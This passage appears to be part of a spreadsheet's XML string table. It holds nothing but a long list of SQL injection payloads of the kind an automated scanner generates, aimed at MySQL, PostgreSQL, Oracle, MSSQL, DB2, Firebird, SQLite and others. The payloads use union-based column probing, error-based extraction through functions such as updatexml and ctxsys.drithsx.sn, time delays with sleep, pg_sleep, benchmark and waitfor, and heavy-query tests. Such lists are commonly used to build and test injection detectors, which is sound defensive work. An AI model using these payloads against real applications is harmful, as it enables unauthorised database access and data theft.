    <t>1' )  as ibaw where 2130 = 2130 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  5336 = 5336</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'trdf' like 'trdf</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-5014%"  )  )   )  or 3348 = 2430--</t>
  </si>
  <si>
    <t>1" )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-2929'  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 'nzmk' = 'nzmk</t>
  </si>
  <si>
    <t>-4582  )  )   as gvfo where 8885 = 8885 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr (</t>
  </si>
  <si>
    <t>1'|| ( select 'alxi' where 3967 = 3967 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>-2899"  )  )   as uyoc where 8417 = 8417 union all select 8417,8417,8417,8417--</t>
  </si>
  <si>
    <t>1'  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  'oxvd' like 'oxvd</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual</t>
  </si>
  <si>
    <t>-6079  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr</t>
  </si>
  <si>
    <t>1'  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and 'hqqj' = 'hqqj</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 7616 = 7616 )  then 1 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>1' in boolean mode )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) #</t>
  </si>
  <si>
    <t>1' )  and 2305 = 1934</t>
  </si>
  <si>
    <t>1'  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'vcvj' = 'vcvj</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 )  as zdym where 1578 = 1578 union all select null,null,null#</t>
  </si>
  <si>
    <t>1" where 7290 = 7290 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   as kgiw where 7452 = 7452 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'  )  )   as tcby where 5213 = 5213</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  and  ( 3020 = 3020 ) *6703 and  ( "qowc" like "qowc</t>
  </si>
  <si>
    <t>1%' and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) </t>
  </si>
  <si>
    <t>1'|| ( select 'hkvl' from dual where 8882 = 8882</t>
  </si>
  <si>
    <t>-3699%'  )  )   )  union all select 8241,8241,8241,8241,8241,8241,8241,8241,8241#</t>
  </si>
  <si>
    <t>1"  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  where 1333 = 1333 order by 1--</t>
  </si>
  <si>
    <t>1%' )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>select  ( case when  ( 6969 = 5797 )  then 6969 else 6969* ( select 6969 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-4770  )  )   )  union all select 6356,6356,6356,6356,6356#</t>
  </si>
  <si>
    <t>1%' )  and sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'tvar' = 'tvar</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "cwpt" like "cwpt</t>
  </si>
  <si>
    <t>1" where 3274 = 3274 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  'mttj' like 'mttj</t>
  </si>
  <si>
    <t>select  ( case when  ( 3486 = 6373 )  then 3486 else 3486* ( select 3486 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( 'brhc' like 'brhc</t>
  </si>
  <si>
    <t>1"  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( "sdvu" like "sdvu</t>
  </si>
  <si>
    <t>1'  )  )   as xjen where 6791 = 6791 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-3501' )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 </t>
  </si>
  <si>
    <t>1' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and 'rupq' = 'rupq</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  "vfvh" = "vfvh</t>
  </si>
  <si>
    <t>1'  )  )   and 7533 = 7533 and   (  (  'gvoh' = 'gvoh</t>
  </si>
  <si>
    <t>1"  )  )   as tsry where 6594 = 6594 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1" )  as eaxo where 2728 = 2728</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select 6825 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6825 = 6825,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>1 where 3744 = 3744</t>
  </si>
  <si>
    <t>1'  )  )   as nsfx where 9553 = 9553 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) </t>
  </si>
  <si>
    <t>1 )  as bidc where 5268 = 5268 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'npdx' from dual where 9486 = 9486 and sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>-1940 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   a</t>
  </si>
  <si>
    <t>-1722' union all select 1408,1408,1408#</t>
  </si>
  <si>
    <t>-3997'+ ( select 'avjk' where 1917 = 1917 union all select 1917,1917,1917--</t>
  </si>
  <si>
    <t>select * from generate_series ( 7762,7762,case when  ( 7762 = 1293 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1' where 7725 = 7725 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>-3228" )  or  ( 5901 = 1570 ) *1570 and  ( "egdd" = "egdd</t>
  </si>
  <si>
    <t>1"  )  )   as nhus where 3689 = 3689</t>
  </si>
  <si>
    <t>1%" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and "%" = "</t>
  </si>
  <si>
    <t>-8794  )  )   )  union all select 5802,5802,5802--</t>
  </si>
  <si>
    <t>1" or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "bkrk" = "bkrk</t>
  </si>
  <si>
    <t>1  )  )   as jmcp where 8624 = 8624 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  'jylk' = 'jylk</t>
  </si>
  <si>
    <t>1' )  where 5680 = 5680 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>-6357" )  union all select 9767,9767,9767,9767,9767,9767,9767,9767,9767#</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 'nhrc' like 'nhrc</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  where 4500 = 4500</t>
  </si>
  <si>
    <t>1  )  )   as rvex where 3462 = 3462 and 4595 = 4595#</t>
  </si>
  <si>
    <t>-7663'  )  )   or 1558 = 1104 and   (  (  'wsrq' = 'wsrq</t>
  </si>
  <si>
    <t>1%'  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' )  where 6720 = 6720 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   or sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  where 9381 = 9381 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>select case when 7634 = 3954 then 1 else null end--</t>
  </si>
  <si>
    <t>-9240' union all select 6538,6538,6538#</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( 'itgc' = 'itgc</t>
  </si>
  <si>
    <t>-5606 )  union all select 7118,7118,7118,7118,7118,7118,7118,7118,7118#</t>
  </si>
  <si>
    <t>1'  )  )   as eltx where 9955 = 9955 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>-3782%" )  or make_set ( 9354 = 9354,7185 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq ) </t>
  </si>
  <si>
    <t>-2372' or 1783 = 2656</t>
  </si>
  <si>
    <t xml:space="preserve"> end and 'aenf' = 'aenf</t>
  </si>
  <si>
    <t>-8929' union all select 5324,5324,5324,5324,5324,5324--</t>
  </si>
  <si>
    <t>1'  )  )   )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1" )  where 6679 = 6679 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' where 5023 = 5023 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'ykxz' = 'ykxz</t>
  </si>
  <si>
    <t>-3752%' union all select 9351--</t>
  </si>
  <si>
    <t>-9382' )  union all select 4774,4774,4774,4774--</t>
  </si>
  <si>
    <t>1" )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1" where 3368 = 3368 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>1 where 5099 = 5099 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'xbwg' where 7518 = 7518 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) #</t>
  </si>
  <si>
    <t>-4826 union all select 4532,4532,4532,4532,4532--</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 3548 = 8646,1,1/0 ) </t>
  </si>
  <si>
    <t>-5643'  )  )   union all select 1515,1515#</t>
  </si>
  <si>
    <t>1%"  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-4001'  )  )   or 5634 = 4044--</t>
  </si>
  <si>
    <t>1'|| ( select 'ttyt' where 3751 = 3751 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' where 6003 = 6003 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'scqw' where 3337 = 3337 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'rvwk' = 'rvwk</t>
  </si>
  <si>
    <t>1  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  3038 = 3038</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( 'klma' = 'klma</t>
  </si>
  <si>
    <t>1'+ ( select blbd where 7451 = 7451 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  +'</t>
  </si>
  <si>
    <t>1'|| ( select 'mjkz' where 9430 = 9430  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users  )  )  ||'</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  "vqpx" like "vqpx</t>
  </si>
  <si>
    <t>1' where 7190 = 7190 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>if ( 6624 = 4232 )  select 6624 else drop function xyyt--</t>
  </si>
  <si>
    <t>1' )  order by 1#</t>
  </si>
  <si>
    <t>-9078 union all select 3779,3779,3779,3779,3779,3779,3779,3779--</t>
  </si>
  <si>
    <t>1" and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-5989%" union all select 3581,3581,3581,3581,3581--</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  -- ygbf</t>
  </si>
  <si>
    <t>1' )  as xhmm where 8092 = 8092 union all select null,null,null--</t>
  </si>
  <si>
    <t>1 and  ( 1977 = 6852 ) *6852-- clxl</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  "uhvy" = "uhvy</t>
  </si>
  <si>
    <t>1%' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'|| ( select 'xmoq' from dual where 8047 = 8047 and 7533 = 7533 ) ||'</t>
  </si>
  <si>
    <t>1" )  rlike sleep ( 5 )  and  ( "rfsd" = "rfsd</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( "fqap" like "fqap</t>
  </si>
  <si>
    <t>-2784 )  where 5261 = 5261 or 3472 = 1728#</t>
  </si>
  <si>
    <t>select  ( case when  ( 4994 = 1572 )  then 4994 else 4994* ( select 4994 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'uwbt' like 'uwbt</t>
  </si>
  <si>
    <t>-4802 union all select 7381,7381,7381,7381,7381,7381,7381,7381,7381,7381--</t>
  </si>
  <si>
    <t>1'  )  )   as clbc where 5649 = 5649</t>
  </si>
  <si>
    <t>1 where 5700 = 5700</t>
  </si>
  <si>
    <t>-7306" or 2081 = 6847</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1' )  where 9454 = 9454 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) -- vhmc</t>
  </si>
  <si>
    <t>1'|| ( select 'qrle' from dual where 9239 = 9239 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) ||'</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" where 5477 = 5477</t>
  </si>
  <si>
    <t>1  )  )   as wufr where 5239 = 5239 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-1922%' )  union all select 2335,2335,2335,2335,2335,2335,2335,2335,2335,2335--</t>
  </si>
  <si>
    <t>1' )  and elt ( 5245 = 9203,9203 )  and  ( 'fhlw' like 'fhlw</t>
  </si>
  <si>
    <t>-2717" or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-7307'  )  )   union all select 5215,5215,5215,5215--</t>
  </si>
  <si>
    <t>1' )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( 'tetk' = 'tetk</t>
  </si>
  <si>
    <t>1 )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 4703 = 4703</t>
  </si>
  <si>
    <t>-9672%"  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>1" where 1386 = 1386</t>
  </si>
  <si>
    <t>select  ( case when  ( 9556 = 7122 )  then 9556 else 9556* ( select 9556 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1%" )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1" and elt ( 4249 = 4249,7259 )  and "tmxx" = "tmxx</t>
  </si>
  <si>
    <t>1%' and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and "owzc" like "owzc</t>
  </si>
  <si>
    <t>1 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) -- ixlk</t>
  </si>
  <si>
    <t>-2086%'  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1 where 7522 = 7522 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  rlike sleep ( 5 ) </t>
  </si>
  <si>
    <t>1" where 8635 = 8635 and 4595 = 4595#</t>
  </si>
  <si>
    <t>1%'  )  )   or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null--</t>
  </si>
  <si>
    <t>-4707' union all select 4414,4414,4414,4414,4414,4414#</t>
  </si>
  <si>
    <t xml:space="preserve">-1152%' )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr </t>
  </si>
  <si>
    <t xml:space="preserve">-2106" or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1'+ ( select 'wkcq' where 1020 = 1020 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>-6118 union all select 5906,5906,5906,5906,5906#</t>
  </si>
  <si>
    <t>-8580' )  union all select 3428,3428,3428,3428,3428,3428,3428,3428,3428#</t>
  </si>
  <si>
    <t>1" )  as wehx where 5744 = 5744</t>
  </si>
  <si>
    <t>-3750'+ ( select alpu where 3911 = 3911 order by 1--</t>
  </si>
  <si>
    <t>1'+ ( select 'wsjk' where 3291 = 3291</t>
  </si>
  <si>
    <t>1' )  as bvvl where 9818 = 9818 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1 where 5382 = 5382 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" )  and sleep ( 5 ) #</t>
  </si>
  <si>
